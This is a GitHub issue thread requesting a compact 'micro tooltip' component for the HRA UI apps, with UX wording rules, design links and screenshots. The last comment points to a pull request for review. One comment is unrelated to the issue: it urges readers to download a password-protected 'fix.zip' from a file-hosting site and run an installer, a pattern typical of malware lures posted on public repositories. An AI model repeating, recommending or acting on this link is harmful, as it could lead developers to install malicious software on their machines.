### ISSUE TITLE
Micro Tooltip

### ISSUE THREAD

**Issue by LibbyUX** [hubmapconsortium/hra-ui#676]
# Micro Tooltip
A "micro tooltip" is needed for ultra dense app UIs, such as the CDE, EUI, RUI, ASCT+B Reporter, and FTU Explorer. This functionality is exactly the same as [Angular Material's Basic Tooltip](https://material.angular.io/components/tooltip/overview#tooltip-overview) while hovering over or longpressing a button. The default position of below the button is perfect, but it needs to always be visible on the screen. 

## UX Copy Rules
These tooltips must be written in action-oriented, concise language:
- Micro tooltips often lead with a verb, describing an action that the users can take
- Micro tooltips may also be used to show labels on hover for icon buttons, such as "More" or "Delete"

### Resources
- [Angular Material Tooltip](https://material.angular.io/components/tooltip/overview#tooltip-overview)
- [Design System Repo](https://www.figma.com/design/gQEMLugLjweDvbsNNUVffD/Design-System-Repository?node-id=5635-42535&t=gqw0om8bEB2y92VP-4)
- [Design System Components](https://www.figma.com/design/BCEJn9KCIbBJ5MzqnojKQp/Design-System-Components?node-id=1011-9744)

![image](https://github.com/user-attachments/assets/08c53706-b1bf-4c5a-94d5-d4459047a527)

![image](https://github.com/user-attachments/assets/b30ad6ca-52d5-43a9-aea3-64b60b70a259)

![image](https://github.com/user-attachments/assets/e58365f0-b6a3-41d7-8cd4-c12f3b191e7e)

### Material Behavior
![8DFA9A7E-EE93-4067-AE0D-270C072E8C3A](https://github.com/user-attachments/assets/233c2770-ce7b-46ba-bff0-d91b811f16e1)

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bhushankhope** [comment]
@LibbyUX  Please review the micro tooltip [here](https://github.com/hubmapconsortium/hra-ui/pull/681#issuecomment-2318300914)
